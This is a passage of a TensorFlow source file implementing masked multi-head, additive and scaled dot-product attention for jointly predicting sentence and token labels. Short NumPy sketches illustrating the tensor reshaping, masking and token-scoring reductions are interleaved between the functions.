token_scores, token_predictions, \
token_probabilities, sentence_probabilities, attention_weights
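A minimal NumPy sketch (illustrative only, not part of the model) of the split-and-concat head reshaping used throughout this file: a [B, M, num_units] tensor is split into num_heads slices along the feature axis and concatenated along the batch axis, and the inverse concat restores the original tensor.

```python
import numpy as np

# Hypothetical small shapes for illustration.
B, M, num_units, num_heads = 2, 5, 12, 3
x = np.arange(B * M * num_units, dtype=float).reshape(B, M, num_units)

# Forward: [B, M, num_units] -> [B*num_heads, M, num_units/num_heads]
heads = np.concatenate(np.split(x, num_heads, axis=2), axis=0)
assert heads.shape == (B * num_heads, M, num_units // num_heads)

# Inverse: split along the batch axis, concat along the feature axis.
restored = np.concatenate(np.split(heads, num_heads, axis=0), axis=2)
assert (restored == x).all()
```

The same round trip is what `tf.concat(tf.split(..., num_heads), axis=2)` performs on `product` and `token_scores` above.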
def multi_head_attention_with_scores_from_separate_heads(
inputs,
initializer,
attention_activation,
num_sentence_labels,
num_heads,
is_training,
dropout,
sentence_lengths,
normalize_sentence,
token_scoring_method,
scoring_activation=None,
separate_heads=True):
"""
Computes multi-head attention (mainly inspired by the transformer architecture).
This version of the implementation applies masking at several levels:
* first, the keys, queries and values so that the matrix multiplications
are performed only between meaningful positions
* second, the attention evidence values of 0 should be replaced with -infinity
so that when applying a non-linear layer, the resulted value is very close to 0.
* third, when obtaining the token probabilities (by normalizing across the scores),
division masking is performed (a value of 0 should be attributed to all 0 sums).
The masking performed before computing a primary/secondary loss is preserved.
:param inputs: 3D floats of shape [B, M, E]
:param initializer: type of initializer (best if Glorot or Xavier)
:param attention_activation: type of attention activation: soft (sigmoid), sharp (exp), linear or softmax
:param num_sentence_labels: number of unique sentence labels
:param num_heads: number of attention heads (one per unique token label)
:param is_training: if set to True, the current phase is a training one (rather than testing)
:param dropout: the keep_probs value for the dropout
:param sentence_lengths: the true sentence lengths, used for masking
:param normalize_sentence: if set to True, the last weighted sentence layer is normalized
:param token_scoring_method: can be max, sum, avg or logsumexp
:param scoring_activation: used in computing the sentence scores from the token scores (per-head)
:param separate_heads: boolean value; when set to False, all heads
are used to obtain the sentence scores; when set to True, the default and non-default heads
from the token scores are used to obtain the sentence scores.
:return sentence_scores: 2D floats of shape [B, num_sentence_labels]
:return sentence_predictions: predicted labels for each sentence in the batch; ints of shape [B]
:return token_scores: 3D floats of shape [B, M, num_heads]
:return token_predictions: predicted labels for each token in each sentence; ints of shape [B, M]
:return token_probabilities: 3D floats of shape [B, M, num_heads], normalized across heads
:return sentence_probabilities: 2D floats of shape [B, num_sentence_labels]
:return attention_weights: 4D floats of shape [B, M, M, num_heads]
"""
with tf.variable_scope("MHA_sentence_scores_from_separate_heads"):
num_units = inputs.get_shape().as_list()[-1]
if num_units % num_heads != 0:
num_units = ceil(num_units / num_heads) * num_heads
inputs = tf.layers.dense(inputs, num_units) # [B, M, num_units]
# Project to get the queries, keys, and values.
queries = tf.layers.dense(
inputs, num_units, activation=tf.tanh,
kernel_initializer=initializer) # [B, M, num_units]
keys = tf.layers.dense(
inputs, num_units, activation=tf.tanh,
kernel_initializer=initializer) # [B, M, num_units]
values = tf.layers.dense(
inputs, num_units, activation=tf.tanh,
kernel_initializer=initializer) # [B, M, num_units]
# Mask out the keys, queries and values: replace with 0 all the token
# positions between the true and the maximum sentence length.
multiplication_mask = tf.tile(
input=tf.expand_dims(tf.sequence_mask(sentence_lengths), axis=-1),
multiples=[1, 1, num_units]) # [B, M, num_units]
queries = tf.where(multiplication_mask, queries, tf.zeros_like(queries))
keys = tf.where(multiplication_mask, keys, tf.zeros_like(keys))
values = tf.where(multiplication_mask, values, tf.zeros_like(values))
# Split and concat as many projections as the number of heads.
queries = tf.concat(
tf.split(queries, num_heads, axis=2),
axis=0) # [B*num_heads, M, num_units/num_heads]
keys = tf.concat(
tf.split(keys, num_heads, axis=2),
axis=0) # [B*num_heads, M, num_units/num_heads]
# Transpose multiplication and scale
attention_evidence = tf.matmul(
queries, tf.transpose(keys, [0, 2, 1])) # [B*num_heads, M, M]
attention_evidence = tf.math.divide(
attention_evidence, tf.constant(num_units ** 0.5))
# Mask columns (with values of -infinity), based on rows that have 0 sum.
attention_evidence_masked = mask(
attention_evidence, queries, keys, mask_type="key")
# Apply a non-linear layer to obtain (un-normalized) attention weights.
if attention_activation == "soft":
attention_weights = tf.nn.sigmoid(attention_evidence_masked)
elif attention_activation == "sharp":
attention_weights = tf.math.exp(attention_evidence_masked)
elif attention_activation == "linear":
attention_weights = attention_evidence_masked
elif attention_activation == "softmax":
attention_weights = tf.nn.softmax(attention_evidence_masked)
else:
raise ValueError("Unknown/unsupported attention activation: %s."
% attention_activation)
# Normalize attention weights.
if attention_activation != "softmax":
attention_weights /= tf.reduce_sum(
attention_weights, axis=-1, keep_dims=True)
# Mask rows (with values of 0), based on columns that have 0 sum.
attention_weights = mask(
attention_weights, queries, keys, mask_type="query")
# Apply a dropout layer on the attention weights.
if dropout > 0.0:
dropout_attention = (dropout * tf.cast(is_training, tf.float32)
+ (1.0 - tf.cast(is_training, tf.float32)))
attention_weights = tf.nn.dropout(
attention_weights, dropout_attention,
name="dropout_attention_weights") # [B*num_heads, M, M]
# Obtain the token scores from the attention weights.
# The token_scores below will have shape [B*num_heads, 1, M].
if token_scoring_method == "sum":
token_scores = tf.reduce_sum(
attention_weights, axis=1, keep_dims=True)
elif token_scoring_method == "max":
token_scores = tf.reduce_max(
attention_weights, axis=1, keep_dims=True)
elif token_scoring_method == "avg":
token_scores = tf.reduce_mean(
attention_weights, axis=1, keep_dims=True)
elif token_scoring_method == "logsumexp":
token_scores = tf.reduce_logsumexp(
attention_weights, axis=1, keep_dims=True)
else:
raise ValueError("Unknown/unsupported token scoring method: %s"
% token_scoring_method)
token_scores = tf.concat(
tf.split(token_scores, num_heads),
axis=1) # [B, num_heads, M]
token_scores_normalized = division_masking(
inputs=token_scores, axis=-1,
multiplies=[1, 1, tf.shape(token_scores)[-1]]) # [B, num_heads, M]
token_probabilities = tf.nn.softmax(token_scores, axis=1)
token_predictions = tf.argmax(
token_probabilities, axis=1, output_type=tf.int32) # [B, M]
# Obtain a weighted sum between the inputs and the attention weights.
# [B, num_heads, num_units]
weighted_sum_representation = tf.matmul(token_scores_normalized, values)
if normalize_sentence:
weighted_sum_representation = layer_normalization(weighted_sum_representation)
if separate_heads:
# Get the sentence representations corresponding to the default head.
default_head = tf.gather(
weighted_sum_representation,
indices=[0], axis=1) # [B, 1, num_units]
# Get the sentence representations corresponding to the non-default heads.
non_default_heads = tf.gather(
weighted_sum_representation,
indices=list(range(1, num_heads)), axis=1) # [B, num_heads-1, num_units]
# Project onto one unit, corresponding to
# the default sentence label score.
sentence_default_scores = tf.layers.dense(
default_head, units=1,
activation=scoring_activation, kernel_initializer=initializer,
name="sentence_default_scores_ff") # [B, 1, 1]
sentence_default_scores = tf.squeeze(
sentence_default_scores, axis=-1) # [B, 1]
# Project onto (num_sentence_labels-1) units, corresponding to
# the non-default sentence label scores.
sentence_non_default_scores = tf.layers.dense(
non_default_heads, units=num_sentence_labels-1,
activation=scoring_activation, kernel_initializer=initializer,
name="sentence_non_default_scores_ff") # [B, num_heads-1, num_sentence_labels-1]
sentence_non_default_scores = tf.reduce_mean(
sentence_non_default_scores, axis=1) # [B, num_sent_labels-1]
sentence_scores = tf.concat(
[sentence_default_scores, sentence_non_default_scores],
axis=-1, name="sentence_scores_concatenation") # [B, num_sent_labels]
else:
processed_tensor = tf.layers.dense(
inputs=weighted_sum_representation, units=num_sentence_labels,
activation=scoring_activation, kernel_initializer=initializer,
name="sentence_scores_ff") # [B, num_heads, num_unique_sent_labels]
sentence_scores = tf.reduce_sum(
processed_tensor, axis=1) # [B, num_sent_labels]
sentence_probabilities = tf.nn.softmax(sentence_scores)
sentence_predictions = tf.argmax(sentence_probabilities, axis=1) # [B]
# Get token scores and probabilities of shape [B, M, num_heads].
token_scores = tf.transpose(token_scores, [0, 2, 1])
token_probabilities = tf.transpose(token_probabilities, [0, 2, 1])
attention_weights = tf.concat(
tf.split(tf.expand_dims(attention_weights, axis=-1), num_heads),
axis=-1) # [B, M, M, num_heads]
return sentence_scores, sentence_predictions, \
token_scores, token_predictions, \
token_probabilities, sentence_probabilities, attention_weights
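A NumPy sketch (illustrative only, with hypothetical shapes) of the `separate_heads` gather above: head 0 of the weighted sentence representation feeds the default sentence label, while the remaining heads feed the non-default labels.

```python
import numpy as np

# Hypothetical shapes: [B, num_heads, num_units].
B, num_heads, num_units = 2, 4, 8
rep = np.arange(B * num_heads * num_units, dtype=float).reshape(B, num_heads, num_units)

# tf.gather(..., indices=[0], axis=1) keeps the default head only.
default_head = np.take(rep, [0], axis=1)                         # [B, 1, num_units]
# tf.gather(..., indices=range(1, num_heads), axis=1) keeps the rest.
non_default_heads = np.take(rep, list(range(1, num_heads)), axis=1)  # [B, num_heads-1, num_units]

assert default_head.shape == (B, 1, num_units)
assert non_default_heads.shape == (B, num_heads - 1, num_units)
assert (default_head[:, 0] == rep[:, 0]).all()
```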
def compute_scores_from_additive_attention(
inputs,
initializer,
attention_activation,
sentence_lengths,
attention_size=50,
hidden_units=50):
"""
Computes token and sentence scores from a single-head additive attention mechanism.
:param inputs: 3D floats of shape [B, M, E]
:param initializer: type of initializer (best if Glorot or Xavier)
:param attention_activation: type of attention activation: soft (sigmoid), sharp (exp) or linear
:param sentence_lengths: 1D ints of shape [B]; the true sentence lengths, used for masking
:param attention_size: number of units to use for the attention evidence
:param hidden_units: number of units to use for the processed sent tensor
:return sentence_scores: sentence-level scores from the attention-weighted inputs; floats of shape [B]
:return token_scores: result of the un-normalized attention weights; floats of shape [B, M]
:return attention_weights: 2D floats of shape [B, M] of normalized token_scores
"""
with tf.variable_scope("compute_classic_single_head_attention"):
attention_evidence = tf.layers.dense(
inputs=inputs, units=attention_size,
activation=tf.tanh, kernel_initializer=initializer) # [B, M, attention_size]
attention_weights = tf.layers.dense(
inputs=attention_evidence, units=1,
kernel_initializer=initializer) # [B, M, 1]
attention_weights = tf.squeeze(attention_weights, axis=-1) # [B, M]
# Obtain the un-normalized attention weights.
if attention_activation == "soft":
attention_weights = tf.nn.sigmoid(attention_weights)
elif attention_activation == "sharp":
attention_weights = tf.exp(attention_weights)
elif attention_activation == "linear":
pass  # linear activation: leave the weights unchanged
else:
raise ValueError("Unknown/unsupported attention activation: %s"
% attention_activation)
attention_weights = tf.where(
tf.sequence_mask(sentence_lengths),
attention_weights, tf.zeros_like(attention_weights))
token_scores = attention_weights # [B, M]
# Obtain the normalized attention weights (they will also be sentence weights).
attention_weights = attention_weights / tf.reduce_sum(
attention_weights, axis=1, keep_dims=True) # [B, M]
product = inputs * tf.expand_dims(attention_weights, axis=-1) # [B, M, num_units]
processed_tensor = tf.reduce_sum(product, axis=1) # [B, E]
if hidden_units > 0:
processed_tensor = tf.layers.dense(
inputs=processed_tensor, units=hidden_units,
activation=tf.tanh, kernel_initializer=initializer) # [B, hidden_units]
sentence_scores = tf.layers.dense(
inputs=processed_tensor, units=1,
activation=tf.sigmoid, kernel_initializer=initializer,
name="output_sent_single_head_ff") # [B, 1]
sentence_scores = tf.squeeze(sentence_scores, axis=-1)
return sentence_scores, token_scores, attention_weights
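A NumPy sketch (illustrative only, with made-up lengths and weights) of the masking and renormalization applied to the additive attention weights above: positions past each true sentence length are zeroed, then each row is rescaled to sum to 1.

```python
import numpy as np

lengths = np.array([3, 2])                      # true sentence lengths, M = 4
weights = np.array([[0.5, 0.2, 0.3, 0.9],
                    [0.4, 0.6, 0.7, 0.1]])      # un-normalized attention weights

# Equivalent of tf.sequence_mask(lengths) followed by tf.where(..., 0).
mask = np.arange(weights.shape[1]) < lengths[:, None]
weights = np.where(mask, weights, 0.0)

# Renormalize so each row sums to 1 (tf.reduce_sum with keep_dims).
weights = weights / weights.sum(axis=1, keepdims=True)

assert np.allclose(weights.sum(axis=1), 1.0)
assert weights[0, 3] == 0.0 and weights[1, 2] == 0.0
```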
def compute_scores_from_scaled_dot_product_attention(
inputs,
initializer,
attention_activation,
sentence_lengths,
token_scoring_method):
"""
Computes token and sentence scores from a single-head scaled dot product attention mechanism.
:param inputs: 3D floats of shape [B, M, E]
:param initializer: type of initializer (best with Glorot or Xavier)
:param attention_activation: type of attention activation: sharp (exp) or soft (sigmoid)
:param sentence_lengths: 1D ints of shape [B]; the true sentence lengths, used for masking
:param token_scoring_method: can be max, sum, avg or logsumexp
:return sentence_scores: 1D floats of shape [B]
:return token_scores: 2D floats of shape [B, M]
:return attention_weights: 3D floats of shape [B, M, M] of masked, normalized attention weights
"""
with tf.variable_scope("compute_transformer_single_head_attention"):
num_units = inputs.get_shape().as_list()[-1]
# Project to get the queries, keys, and values, all of them of shape [B, M, num_units].
queries = tf.layers.dense(
inputs, num_units, activation=tf.tanh,
kernel_initializer=initializer)
keys = tf.layers.dense(
inputs, num_units, activation=tf.tanh,
kernel_initializer=initializer)
# Mask out the keys, queries and values: replace with 0 all the token
# positions between the true and the maximum sentence length.
multiplication_mask = tf.tile(
input=tf.expand_dims(tf.sequence_mask(sentence_lengths), axis=-1),
multiples=[1, 1, num_units]) # [B, M, num_units]
queries = tf.where(multiplication_mask, queries, tf.zeros_like(queries))
keys = tf.where(multiplication_mask, keys, tf.zeros_like(keys))
# Scaled dot-product attention.
attention_evidence = tf.matmul(
queries, tf.transpose(keys, [0, 2, 1])) # [B, M, M]
attention_evidence = tf.math.divide(
attention_evidence, tf.constant(num_units ** 0.5))
# Mask columns (with values of -infinity), based on rows that have 0 sum.
attention_evidence_masked = mask(
attention_evidence, queries, keys, mask_type="key")
# Obtain the un-normalized attention weights.
if attention_activation == "soft":
attention_weights = tf.nn.sigmoid(attention_evidence_masked)
elif attention_activation == "sharp":
attention_weights = tf.exp(attention_evidence_masked)
else:
raise ValueError("Unknown/unsupported activation for attention: %s"
% attention_activation)
attention_weights_unnormalized = attention_weights
# Normalize attention weights.
attention_weights /= tf.reduce_sum(
attention_weights, axis=-1, keep_dims=True) # [B, M, M]
# Mask rows (with values of 0), based on columns that have 0 sum.
attention_weights = mask(
attention_weights, queries, keys, mask_type="query")
attention_weights_unnormalized = mask(
attention_weights_unnormalized, queries, keys, mask_type="query")
# Obtain the token scores from the attention weights.
# The token_scores below will have shape [B, M].
if token_scoring_method == "sum":
token_scores = tf.reduce_sum(
attention_weights_unnormalized, axis=1)
elif token_scoring_method == "max":
token_scores = tf.reduce_max(
attention_weights_unnormalized, axis=1)
elif token_scoring_method == "avg":
token_scores = tf.reduce_mean(
attention_weights_unnormalized, axis=1)
elif token_scoring_method == "logsumexp":
token_scores = tf.reduce_logsumexp(
attention_weights_unnormalized, axis=1)
else:
raise ValueError("Unknown/unsupported token scoring method: %s"
% token_scoring_method)
token_scores_normalized = division_masking(
inputs=token_scores, axis=-1,
multiplies=[1, tf.shape(token_scores)[1]]) # [B, M]
# Sentence scores as a weighted sum between the inputs and the attention weights.
# weighted_sum_representation = tf.matmul(attention_weights, inputs)
weighted_sum_representation = inputs * tf.expand_dims(
token_scores_normalized, axis=-1) # [B, M, num_units]
processed_tensor = tf.reduce_sum(
weighted_sum_representation, axis=1) # [B, num_units]
sentence_scores = tf.layers.dense(
inputs=processed_tensor, units=1,
activation=tf.sigmoid, kernel_initializer=initializer,
name="sentence_scores_from_scaled_dot_product_ff") # [B, 1]
sentence_scores = tf.squeeze(sentence_scores, axis=-1) # [B]
return sentence_scores, token_scores, attention_weights
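A NumPy sketch (illustrative only, random inputs) of the scaled dot-product evidence computed above: evidence = Q @ K^T / sqrt(num_units), giving one [M, M] attention matrix per batch element.

```python
import numpy as np

B, M, num_units = 2, 3, 4
rng = np.random.default_rng(0)
queries = rng.standard_normal((B, M, num_units))
keys = rng.standard_normal((B, M, num_units))

# tf.matmul(queries, tf.transpose(keys, [0, 2, 1])) / sqrt(num_units)
evidence = np.matmul(queries, keys.transpose(0, 2, 1)) / num_units ** 0.5
assert evidence.shape == (B, M, M)
```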
def single_head_attention_multiple_transformations(
inputs,
initializer,
attention_activation,
num_sentence_labels,
num_heads,
sentence_lengths,
token_scoring_method,
scoring_activation=None,
how_to_compute_attention="dot",
separate_heads=True):
"""
Computes token and sentence scores using a single-head attention mechanism,
which can either be additive (mainly inspired by the single-head binary-label
method above, as in the Rei and Søgaard paper https://arxiv.org/pdf/1811.05949.pdf)
or a scaled-dot product version (inspired by the transformer, but with just one head).
Then, use these scores to obtain predictions at both granularities.
:param inputs: 3D floats of shape [B, M, E]
:param initializer: type of initializer (best if Glorot or Xavier)
:param attention_activation: type of attention activation (soft, sharp or linear), passed to the chosen attention computation
:param num_sentence_labels: number of unique sentence labels
:param num_heads: number of unique token labels
:param sentence_lengths: the true sentence lengths, used for masking
:param token_scoring_method: can be max, sum, avg or logsumexp (used by the scaled dot-product version)
:param scoring_activation: activation used for scoring, default is None.
:param how_to_compute_attention: "additive" (classic, as in Rei's work) or "dot" (scaled dot-product, as in the transformer)
:param separate_heads: boolean value; when set to False, all heads
are used to obtain the sentence scores; when set to True, the default and non-default heads
from the token scores are used to obtain the sentence scores.
:return sentence_scores: 2D floats of shape [B, num_sentence_labels]
:return sentence_predictions: predicted labels for each sentence in the batch; ints of shape [B]
:return token_scores: 3D floats of shape [B, M, num_heads]
:return token_predictions: predicted labels for each token in each sentence; ints of shape [B, M]
:return token_probabilities: 3D floats of shape [B, M, num_heads], normalized across heads
:return sentence_probabilities: 2D floats of shape [B, num_sentence_labels]
:return attention_weights: the per-head attention weights, stacked along the last axis
"""
with tf.variable_scope("transformer_single_heads_multi_attention"):
token_scores_per_head = []
sentence_scores_per_head = []
attention_weights_per_head = []
for i in range(num_heads):
with tf.variable_scope("num_head_{}".format(i), reuse=tf.AUTO_REUSE):
if how_to_compute_attention == "additive":
sentence_scores_head_i, token_scores_head_i, attention_weights_head_i = \
compute_scores_from_additive_attention(
inputs=inputs, initializer=initializer,
attention_activation=attention_activation,
sentence_lengths=sentence_lengths)
elif how_to_compute_attention == "dot":
sentence_scores_head_i, token_scores_head_i, attention_weights_head_i = \
compute_scores_from_scaled_dot_product_attention(
inputs=inputs, initializer=initializer,
attention_activation=attention_activation,
sentence_lengths=sentence_lengths,
token_scoring_method=token_scoring_method)
else:
raise ValueError("Unknown/unsupported way of computing the attention: %s"
% how_to_compute_attention)
sentence_scores_per_head.append(sentence_scores_head_i)
token_scores_per_head.append(token_scores_head_i)
attention_weights_per_head.append(attention_weights_head_i)
sentence_scores = tf.stack(sentence_scores_per_head, axis=-1) # [B, num_heads]
if separate_heads:
sentence_default_score = tf.layers.dense(
inputs=tf.expand_dims(sentence_scores[:, 0], axis=-1), units=1,
activation=scoring_activation, kernel_initializer=initializer,
name="ff_default_sentence_scores")
sentence_non_default_scores = tf.layers.dense(
inputs=sentence_scores[:, 1:], units=num_sentence_labels-1,
activation=scoring_activation, kernel_initializer=initializer,
name="ff_non_default_sentence_scores")
sentence_scores = tf.concat(
[sentence_default_score, sentence_non_default_scores],
axis=-1, name="sentence_scores_concatenation")
else:
sentence_scores = tf.layers.dense(
inputs=sentence_scores, units=num_sentence_labels,
activation=scoring_activation, kernel_initializer=initializer,
name="ff_sentence_scores") # [B, num_sentence_labels]
sentence_probabilities = tf.nn.softmax(sentence_scores)
sentence_predictions = tf.argmax(sentence_probabilities, axis=1) # [B]
token_scores = tf.stack(token_scores_per_head, axis=-1) # [B, M, num_heads]
token_probabilities = tf.nn.softmax(token_scores, axis=-1) # [B, M, num_heads]
token_predictions = tf.argmax(token_probabilities, axis=-1) # [B, M]
# Will be of shape [B, M, H] if an additive attention was used, or
# of shape [B, M, M, H] if a scaled-dot product attention was used.
attention_weights = tf.stack(attention_weights_per_head, axis=-1)
return sentence_scores, sentence_predictions, token_scores, token_predictions, \
token_probabilities, sentence_probabilities, attention_weights
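A NumPy sketch (illustrative only, with a made-up 2x2 attention matrix for a single sentence) comparing the token scoring reductions used in the functions above: each reduces over the row axis, so column j aggregates the attention every token pays to token j.

```python
import numpy as np

attn = np.array([[0.1, 0.9],
                 [0.6, 0.4]])        # one sentence, M = 2

scores = {
    "sum": attn.sum(axis=0),
    "max": attn.max(axis=0),
    "avg": attn.mean(axis=0),
    "logsumexp": np.log(np.exp(attn).sum(axis=0)),
}

assert np.allclose(scores["sum"], [0.7, 1.3])
assert np.allclose(scores["max"], [0.6, 0.9])
assert np.allclose(scores["avg"], [0.35, 0.65])
```

In the batched TF code the same reductions run over axis=1 of a [B*num_heads, M, M] tensor.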
def variant_1(
inputs,
initializer,
attention_activation,
num_sentence_labels,
num_heads,
hidden_units,
sentence_lengths,
scoring_activation=None,
token_scoring_method="max",
use_inputs_instead_values=False,
separate_heads=True):
"""
Variant 1 of the multi-head attention to obtain sentence and token scores and predictions.
"""
with tf.variable_scope("variant_1"):
num_units = inputs.get_shape().as_list()[-1]
if num_units % num_heads != 0:
num_units = ceil(num_units / num_heads) * num_heads
inputs = tf.layers.dense(inputs, num_units) # [B, M, num_units]
# Project to get the queries, keys, and values.
queries = tf.layers.dense(
inputs, num_units, activation=tf.tanh,
kernel_initializer=initializer) # [B, M, num_units]
keys = tf.layers.dense(
inputs, num_units, activation=tf.tanh,
kernel_initializer=initializer) # [B, M, num_units]
values = tf.layers.dense(
inputs, num_units, activation=tf.tanh,
kernel_initializer=initializer) # [B, M, num_units]
# Mask out the keys, queries and values: replace with 0 all the token
# positions between the true and the maximum sentence length.
multiplication_mask = tf.tile(
input=tf.expand_dims(tf.sequence_mask(sentence_lengths), axis=-1),
multiples=[1, 1, num_units]) # [B, M, num_units]
queries = tf.where(multiplication_mask, queries, tf.zeros_like(queries))
keys = tf.where(multiplication_mask, keys, tf.zeros_like(keys))
# Split and concat as many projections as the number of heads.
queries = tf.concat(
tf.split(queries, num_heads, axis=2),
axis=0) # [B*num_heads, M, num_units/num_heads]
keys = tf.concat(
tf.split(keys, num_heads, axis=2),
axis=0) # [B*num_heads, M, num_units/num_heads]
values = tf.concat(
tf.split(values, num_heads, axis=2),
axis=0) # [B*num_heads, M, num_units/num_heads]
inputs = tf.concat(
tf.split(inputs, num_heads, axis=2),
axis=0) # [B*num_heads, M, num_units/num_heads]
# Transpose multiplication and scale
attention_evidence = tf.matmul(
queries, tf.transpose(keys, [0, 2, 1])) # [B*num_heads, M, M]
attention_evidence = tf.math.divide(
attention_evidence, tf.constant(num_units ** 0.5))
# Mask columns (with values of -infinity), based on rows that have 0 sum.
attention_evidence_masked = mask(
attention_evidence, queries, keys, mask_type="key")
# Apply a non-linear layer to obtain (un-normalized) attention weights.
if attention_activation == "soft":
attention_weights = tf.nn.sigmoid(attention_evidence_masked)
elif attention_activation == "sharp":
attention_weights = tf.math.exp(attention_evidence_masked)
elif attention_activation == "linear":
attention_weights = attention_evidence_masked
else:
raise ValueError("Unknown/unsupported attention activation: %s."
% attention_activation)
attention_weights_unnormalized = attention_weights
# Normalize attention weights.
attention_weights /= tf.reduce_sum(
attention_weights, axis=-1, keep_dims=True)
# Mask rows (with values of 0), based on columns that have 0 sum.
attention_weights = mask(
attention_weights, queries, keys, mask_type="query")
attention_weights_unnormalized = mask(
attention_weights_unnormalized, queries, keys, mask_type="query")
# [B*num_heads, M, num_units/num_heads]
if use_inputs_instead_values:
product = tf.matmul(attention_weights, inputs)
else:
product = tf.matmul(attention_weights, values)
product = tf.reduce_sum(product, axis=1) # [B*num_heads, num_units/num_heads]
product = tf.layers.dense(
inputs=product, units=hidden_units,
activation=tf.tanh, kernel_initializer=initializer) # [B*num_heads, hidden_units]
processed_tensor = tf.layers.dense(
inputs=product, units=1,
kernel_initializer=initializer) # [B*num_heads, 1]
processed_tensor = tf.concat(
tf.split(processed_tensor, num_heads), axis=1) # [B, num_heads]
if separate_heads:
if num_sentence_labels == num_heads:
sentence_scores = processed_tensor
else:
# Get the sentence representations corresponding to the default head.
default_head = tf.gather(
processed_tensor,
indices=[0], axis=-1) # [B, 1]
# Get the sentence representations corresponding to the non-default head.
non_default_heads = tf.gather(
processed_tensor,
indices=list(range(1, num_heads)), axis=-1) # [B, num_heads-1]
# Project onto one unit, corresponding to the default sentence label score.
sentence_default_scores = tf.layers.dense(
default_head, units=1,
activation=scoring_activation, kernel_initializer=initializer,
name="sentence_default_scores_ff") # [B, 1]
# Project onto (num_sentence_labels-1) units, corresponding to
# the non-default sentence label scores.
sentence_non_default_scores = tf.layers.dense(
non_default_heads, units=num_sentence_labels - 1,
activation=scoring_activation, kernel_initializer=initializer,
name="sentence_non_default_scores_ff") # [B, num_sentence_labels-1]
sentence_scores = tf.concat(
[sentence_default_scores, sentence_non_default_scores],
axis=-1, name="sentence_scores_concatenation") # [B, num_sent_labels]
else:
sentence_scores = tf.layers.dense(
inputs=processed_tensor, units=num_sentence_labels,
activation=scoring_activation, kernel_initializer=initializer,
name="output_sent_specified_scores_ff") # [B, num_sent_labels]
sentence_probabilities = tf.nn.softmax(sentence_scores)
sentence_predictions = tf.argmax(sentence_probabilities, axis=1) # [B]
# Obtain token scores from attention weights. Shape is [B*num_heads, M].
if token_scoring_method == "sum":
token_scores = tf.reduce_sum(attention_weights_unnormalized, axis=1)
elif token_scoring_method == "max":
token_scores = tf.reduce_max(attention_weights_unnormalized, axis=1)
elif token_scoring_method == "avg":
token_scores = tf.reduce_mean(attention_weights_unnormalized, axis=1)
elif token_scoring_method == "logsumexp":
token_scores = tf.reduce_logsumexp(attention_weights_unnormalized, axis=1)
else:
raise ValueError("Unknown/unsupported token scoring method: %s"
% token_scoring_method)
token_scores = tf.expand_dims(token_scores, axis=2) # [B*num_heads, M, 1]
token_scores = tf.concat(
tf.split(token_scores, num_heads), axis=2) # [B, M, num_heads]
token_probabilities = tf.nn.softmax(token_scores)
token_predictions = tf.argmax(
token_probabilities, axis=2, output_type=tf.int32) # [B, M]
attention_weights = tf.concat(
tf.split(tf.expand_dims(attention_weights, axis=-1), num_heads),
axis=-1) # [B, M, M, num_heads]
return sentence_scores, sentence_predictions, \
token_scores, token_predictions, \
token_probabilities, sentence_probabilities, attention_weights
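A small sketch (illustrative only) of the keep-probability scheduling used for attention dropout in the functions above: during training the keep probability is `dropout`, and at test time it becomes 1.0 (nothing dropped), mirroring `dropout * is_training + (1 - is_training)`.

```python
def attention_keep_prob(dropout, is_training):
    """Keep probability passed to tf.nn.dropout in the attention layers."""
    flag = 1.0 if is_training else 0.0
    return dropout * flag + (1.0 - flag)

assert attention_keep_prob(0.5, True) == 0.5   # training: keep 50% of weights
assert attention_keep_prob(0.5, False) == 1.0  # testing: keep everything
```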
def variant_2(
inputs,
initializer,
attention_activation,
num_sentence_labels,
num_heads,
hidden_units,
sentence_lengths,
scoring_activation=None,
use_inputs_instead_values=False,
separate_heads=True):
"""
Variant 2 of the multi-head attention to obtain sentence and token scores and predictions.
"""
with tf.variable_scope("variant_2"):
num_units = inputs.get_shape().as_list()[-1]
if num_units % num_heads != 0:
num_units = ceil(num_units / num_heads) * num_heads
inputs = tf.layers.dense(inputs, num_units) # [B, M, num_units]
# Project to get the queries, keys, and values.
queries = tf.layers.dense(
inputs, num_units, activation=tf.tanh,
kernel_initializer=initializer) # [B, M, num_units]
keys = tf.layers.dense(
inputs, num_units, activation=tf.tanh,
kernel_initializer=initializer) # [B, M, num_units]
values = tf.layers.dense(
inputs, num_units, activation=tf.tanh,
kernel_initializer=initializer) # [B, M, num_units]
# Mask out the keys, queries and values: replace with 0 all the token
# positions between the true and the maximum sentence length.
multiplication_mask = tf.tile(
input=tf.expand_dims(tf.sequence_mask(sentence_lengths), axis=-1),
multiples=[1, 1, num_units]) # [B, M, num_units]
keys = tf.where(multiplication_mask, keys, tf.zeros_like(keys))
# Split and concat as many projections as the number of heads.
queries = tf.concat(
tf.split(queries, num_heads, axis=2),
axis=0) # [B*num_heads, M, num_units/num_heads]
# [B*num_heads, 1, num_units/num_heads]
queries = tf.reduce_sum(queries, axis=1, keep_dims=True)
keys = tf.concat(
tf.split(keys, num_heads, axis=2),
axis=0) # [B*num_heads, M, num_units/num_heads]
values = tf.concat(
tf.split(values, num_heads, axis=2),
axis=0) # [B*num_heads, M, num_units/num_heads]
inputs = tf.concat(
tf.split(inputs, num_heads, axis=2),
axis=0) # [B*num_heads, M, num_units/num_heads]
# Transpose multiplication and scale
attention_evidence = tf.matmul(
queries, tf.transpose(keys, [0, 2, 1])) # [B*num_heads, 1, M]
attention_evidence = tf.math.divide(
attention_evidence, tf.constant(num_units ** 0.5))
# Mask columns (with values of -infinity), based on rows that have 0 sum.
attention_evidence_masked = mask(
attention_evidence, queries, keys, mask_type="key")
# Apply a non-linear layer to obtain (un-normalized) attention weights.
if attention_activation == "soft":
attention_weights = tf.nn.sigmoid(attention_evidence_masked)
elif attention_activation == "sharp":
attention_weights = tf.math.exp(attention_evidence_masked)
elif attention_activation == "linear":
attention_weights = attention_evidence_masked
else:
raise ValueError("Unknown/unsupported attention activation: %s."
% attention_activation)
attention_weights_unnormalized = attention_weights
# Normalize attention weights.
attention_weights /= tf.reduce_sum(
attention_weights, axis=-1, keep_dims=True)
# Mask rows (with values of 0), based on columns that have 0 sum.
attention_weights = mask(
attention_weights, queries, keys, mask_type="query")
attention_weights_unnormalized = mask(
attention_weights_unnormalized, queries, keys, mask_type="query")
# Transpose attention weights.
attention_weights = tf.transpose(
attention_weights, [0, 2, 1]) # [B*num_heads, M, 1]
# [B*num_heads, M, num_units/num_heads]
if use_inputs_instead_values:
product = inputs * attention_weights
else:
product = values * attention_weights
product = tf.reduce_sum(product, axis=1) # [B*num_heads, num_units/num_heads]
product = tf.layers.dense(
inputs=product, units=hidden_units,
activation=tf.tanh, kernel_initializer=initializer) # [B*num_heads, hidden_units]
processed_tensor = tf.layers.dense(
inputs=product, units=1,
kernel_initializer=initializer) # [B*num_heads, 1]
